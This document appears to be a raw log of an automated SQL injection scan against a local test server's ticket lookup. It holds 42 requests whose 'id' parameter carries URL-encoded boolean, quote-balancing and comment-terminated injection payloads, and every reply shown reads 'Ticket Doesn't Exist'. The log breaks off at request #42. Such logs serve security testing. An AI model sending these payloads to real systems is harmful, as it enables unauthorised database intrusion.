HTTP request [#1]:
GET /?id=78319 HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#1] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:44 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=78319

Ticket Doesn't Exist

############################################################################

HTTP request [#2]:
GET /?id=78319 HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#2] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:44 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=78319

Ticket Doesn't Exist

############################################################################

HTTP request [#3]:
GET /?id=78319..%29%2C%28%2C.%27%29%22 HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#3] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:45 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=78319..%29%2C%28%2C.%27%29%22

Ticket Doesn't Exist

############################################################################

HTTP request [#4]:
GET /?id=78319%27nWKLdw%3C%27%22%3EsBqLxV HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#4] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:45 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=78319%27nWKLdw%3C%27%22%3EsBqLxV

Ticket Doesn't Exist

############################################################################

HTTP request [#5]:
GET /?id=78319%29%20AND%206625%3D1905--%20pjzq HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#5] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:45 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=78319%29%20AND%206625%3D1905--%20pjzq

Ticket Doesn't Exist

############################################################################

HTTP request [#6]:
GET /?id=78319%29%20AND%205001%3D1852%20AND%20%289775%3D9775 HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#6] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:45 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=78319%29%20AND%205001%3D1852%20AND%20%289775%3D9775

Ticket Doesn't Exist

############################################################################

HTTP request [#7]:
GET /?id=78319%29%29%20AND%208742%3D8597%20AND%20%28%281034%3D1034 HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#7] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:45 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=78319%29%29%20AND%208742%3D8597%20AND%20%28%281034%3D1034

Ticket Doesn't Exist

############################################################################

HTTP request [#8]:
GET /?id=78319%29%29%29%20AND%207905%3D3921%20AND%20%28%28%282021%3D2021 HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#8] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:45 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=78319%29%29%29%20AND%207905%3D3921%20AND%20%28%28%282021%3D2021

Ticket Doesn't Exist

############################################################################

HTTP request [#9]:
GET /?id=78319%20AND%208803%3D9321 HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#9] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:45 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=78319%20AND%208803%3D9321

Ticket Doesn't Exist

############################################################################

HTTP request [#10]:
GET /?id=78319%20AND%201145%3D1232--%20sutJ HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#10] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:45 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=78319%20AND%201145%3D1232--%20sutJ

Ticket Doesn't Exist

############################################################################

HTTP request [#11]:
GET /?id=78319%20AND%208307%3D8042%23%20tEUT HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#11] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:45 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=78319%20AND%208307%3D8042%23%20tEUT

Ticket Doesn't Exist

############################################################################

HTTP request [#12]:
GET /?id=78319%29%20WHERE%208847%3D8847%20AND%207901%3D4378--%20ipkw HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#12] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:45 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=78319%29%20WHERE%208847%3D8847%20AND%207901%3D4378--%20ipkw

Ticket Doesn't Exist

############################################################################

HTTP request [#13]:
GET /?id=78319%20WHERE%206479%3D6479%20AND%204040%3D9856--%20BEGo HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#13] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:45 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=78319%20WHERE%206479%3D6479%20AND%204040%3D9856--%20BEGo

Ticket Doesn't Exist

############################################################################

HTTP request [#14]:
GET /?id=78319%2B%28SELECT%20xKlJ%20WHERE%204567%3D4567%20AND%209966%3D6267%29%2B HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#14] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:45 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=78319%2B%28SELECT%20xKlJ%20WHERE%204567%3D4567%20AND%209966%3D6267%29%2B

Ticket Doesn't Exist

############################################################################

HTTP request [#15]:
GET /?id=78319%29%29%20AS%20SSGz%20WHERE%205138%3D5138%20AND%206269%3D3182--%20pUpd HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#15] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:45 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=78319%29%29%20AS%20SSGz%20WHERE%205138%3D5138%20AND%206269%3D3182--%20pUpd

Ticket Doesn't Exist

############################################################################

HTTP request [#16]:
GET /?id=78319%29%20AS%20xpjW%20WHERE%209382%3D9382%20AND%205029%3D7435--%20MJvz HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#16] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:45 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=78319%29%20AS%20xpjW%20WHERE%209382%3D9382%20AND%205029%3D7435--%20MJvz

Ticket Doesn't Exist

############################################################################

HTTP request [#17]:
GET /?id=78319%60%20WHERE%206534%3D6534%20AND%201755%3D1518--%20hHuS HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#17] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:46 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=78319%60%20WHERE%206534%3D6534%20AND%201755%3D1518--%20hHuS

Ticket Doesn't Exist

############################################################################

HTTP request [#18]:
GET /?id=78319%60%29%20WHERE%204921%3D4921%20AND%201283%3D2197--%20cAVu HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#18] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:46 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=78319%60%29%20WHERE%204921%3D4921%20AND%201283%3D2197--%20cAVu

Ticket Doesn't Exist

############################################################################

HTTP request [#19]:
GET /?id=78319%60%3D%6078319%60%20AND%202676%3D6874%20AND%20%6078319%60%3D%6078319 HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#19] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:46 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=78319%60%3D%6078319%60%20AND%202676%3D6874%20AND%20%6078319%60%3D%6078319

Ticket Doesn't Exist

############################################################################

HTTP request [#20]:
GET /?id=78319%5D-%28SELECT%200%20WHERE%201717%3D1717%20AND%209881%3D2842%29%7C%5B78319 HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#20] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:46 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=78319%5D-%28SELECT%200%20WHERE%201717%3D1717%20AND%209881%3D2842%29%7C%5B78319

Ticket Doesn't Exist

############################################################################

HTTP request [#21]:
GET /?id=78319%27%29%20AND%207772%3D5111--%20NcjF HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#21] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:46 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=78319%27%29%20AND%207772%3D5111--%20NcjF

Ticket Doesn't Exist

############################################################################

HTTP request [#22]:
GET /?id=78319%27%20AND%206372%3D6528--%20AZuZ HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#22] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:46 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=78319%27%20AND%206372%3D6528--%20AZuZ

Ticket Doesn't Exist

############################################################################

HTTP request [#23]:
GET /?id=78319%22%20AND%202547%3D6193--%20rCIq HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#23] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:46 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=78319%22%20AND%202547%3D6193--%20rCIq

Ticket Doesn't Exist

############################################################################

HTTP request [#24]:
GET /?id=78319%27%29%20AND%203625%3D1546%20AND%20%28%27kDUb%27%3D%27kDUb HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#24] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:46 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=78319%27%29%20AND%203625%3D1546%20AND%20%28%27kDUb%27%3D%27kDUb

Ticket Doesn't Exist

############################################################################

HTTP request [#25]:
GET /?id=78319%27%29%29%20AND%204259%3D6018%20AND%20%28%28%27Jipy%27%3D%27Jipy HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#25] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:46 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=78319%27%29%29%20AND%204259%3D6018%20AND%20%28%28%27Jipy%27%3D%27Jipy

Ticket Doesn't Exist

############################################################################

HTTP request [#26]:
GET /?id=78319%27%29%29%29%20AND%208508%3D7681%20AND%20%28%28%28%27auEu%27%3D%27auEu HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#26] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:46 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=78319%27%29%29%29%20AND%208508%3D7681%20AND%20%28%28%28%27auEu%27%3D%27auEu

Ticket Doesn't Exist

############################################################################

HTTP request [#27]:
GET /?id=78319%27%20AND%209340%3D9207%20AND%20%27INpm%27%3D%27INpm HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#27] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:46 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=78319%27%20AND%209340%3D9207%20AND%20%27INpm%27%3D%27INpm

Ticket Doesn't Exist

############################################################################

HTTP request [#28]:
GET /?id=78319%27%29%20AND%204086%3D4399%20AND%20%28%27ebpd%27%20LIKE%20%27ebpd HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#28] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:47 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=78319%27%29%20AND%204086%3D4399%20AND%20%28%27ebpd%27%20LIKE%20%27ebpd

Ticket Doesn't Exist

############################################################################

HTTP request [#29]:
GET /?id=78319%27%29%29%20AND%206230%3D8434%20AND%20%28%28%27ibHC%27%20LIKE%20%27ibHC HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#29] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:47 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=78319%27%29%29%20AND%206230%3D8434%20AND%20%28%28%27ibHC%27%20LIKE%20%27ibHC

Ticket Doesn't Exist

############################################################################

HTTP request [#30]:
GET /?id=78319%27%29%29%29%20AND%209297%3D7879%20AND%20%28%28%28%27GNSK%27%20LIKE%20%27GNSK HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#30] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:47 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=78319%27%29%29%29%20AND%209297%3D7879%20AND%20%28%28%28%27GNSK%27%20LIKE%20%27GNSK

Ticket Doesn't Exist

############################################################################

HTTP request [#31]:
GET /?id=78319%25%27%20AND%204566%3D1722%20AND%20%27YvyW%25%27%3D%27YvyW HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#31] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:47 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=78319%25%27%20AND%204566%3D1722%20AND%20%27YvyW%25%27%3D%27YvyW

Ticket Doesn't Exist

############################################################################

HTTP request [#32]:
GET /?id=78319%27%20AND%205426%3D1753%20AND%20%27nDtI%27%20LIKE%20%27nDtI HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#32] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:47 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=78319%27%20AND%205426%3D1753%20AND%20%27nDtI%27%20LIKE%20%27nDtI

Ticket Doesn't Exist

############################################################################

HTTP request [#33]:
GET /?id=78319%22%29%20AND%204390%3D3117%20AND%20%28%22sUSM%22%3D%22sUSM HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#33] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:47 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=78319%22%29%20AND%204390%3D3117%20AND%20%28%22sUSM%22%3D%22sUSM

Ticket Doesn't Exist

############################################################################

HTTP request [#34]:
GET /?id=78319%22%29%29%20AND%201731%3D7519%20AND%20%28%28%22jdzo%22%3D%22jdzo HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#34] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:47 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=78319%22%29%29%20AND%201731%3D7519%20AND%20%28%28%22jdzo%22%3D%22jdzo

Ticket Doesn't Exist

############################################################################

HTTP request [#35]:
GET /?id=78319%22%29%29%29%20AND%207165%3D8703%20AND%20%28%28%28%22ejid%22%3D%22ejid HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#35] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:47 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=78319%22%29%29%29%20AND%207165%3D8703%20AND%20%28%28%28%22ejid%22%3D%22ejid

Ticket Doesn't Exist

############################################################################

HTTP request [#36]:
GET /?id=78319%22%20AND%208132%3D3654%20AND%20%22hEVB%22%3D%22hEVB HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#36] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:47 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=78319%22%20AND%208132%3D3654%20AND%20%22hEVB%22%3D%22hEVB

Ticket Doesn't Exist

############################################################################

HTTP request [#37]:
GET /?id=78319%22%29%20AND%205598%3D3357%20AND%20%28%22JDXt%22%20LIKE%20%22JDXt HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#37] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:47 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=78319%22%29%20AND%205598%3D3357%20AND%20%28%22JDXt%22%20LIKE%20%22JDXt

Ticket Doesn't Exist

############################################################################

HTTP request [#38]:
GET /?id=78319%22%29%29%20AND%209118%3D2003%20AND%20%28%28%22czbT%22%20LIKE%20%22czbT HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#38] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:47 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=78319%22%29%29%20AND%209118%3D2003%20AND%20%28%28%22czbT%22%20LIKE%20%22czbT

Ticket Doesn't Exist

############################################################################

HTTP request [#39]:
GET /?id=78319%22%29%29%29%20AND%206975%3D4780%20AND%20%28%28%28%22MJJh%22%20LIKE%20%22MJJh HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#39] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:47 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=78319%22%29%29%29%20AND%206975%3D4780%20AND%20%28%28%28%22MJJh%22%20LIKE%20%22MJJh

Ticket Doesn't Exist

############################################################################

HTTP request [#40]:
GET /?id=78319%22%20AND%205023%3D5528%20AND%20%22Xzpq%22%20LIKE%20%22Xzpq HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#40] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:47 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=78319%22%20AND%205023%3D5528%20AND%20%22Xzpq%22%20LIKE%20%22Xzpq

Ticket Doesn't Exist

############################################################################

HTTP request [#41]:
GET /?id=78319%27%20AND%201947%3D5242%20OR%20%27yjcf%27%3D%27xizh HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#41] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:47 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=78319%27%20AND%201947%3D5242%20OR%20%27yjcf%27%3D%27xizh

Ticket Doesn't Exist

############################################################################

HTTP request [#42]:
GET /?id=78319%27%29%20WHERE%201090%3D1090%20AND%203402%3D1591--%20tACz HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#42] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:48 GMT
Content-type: text/plain
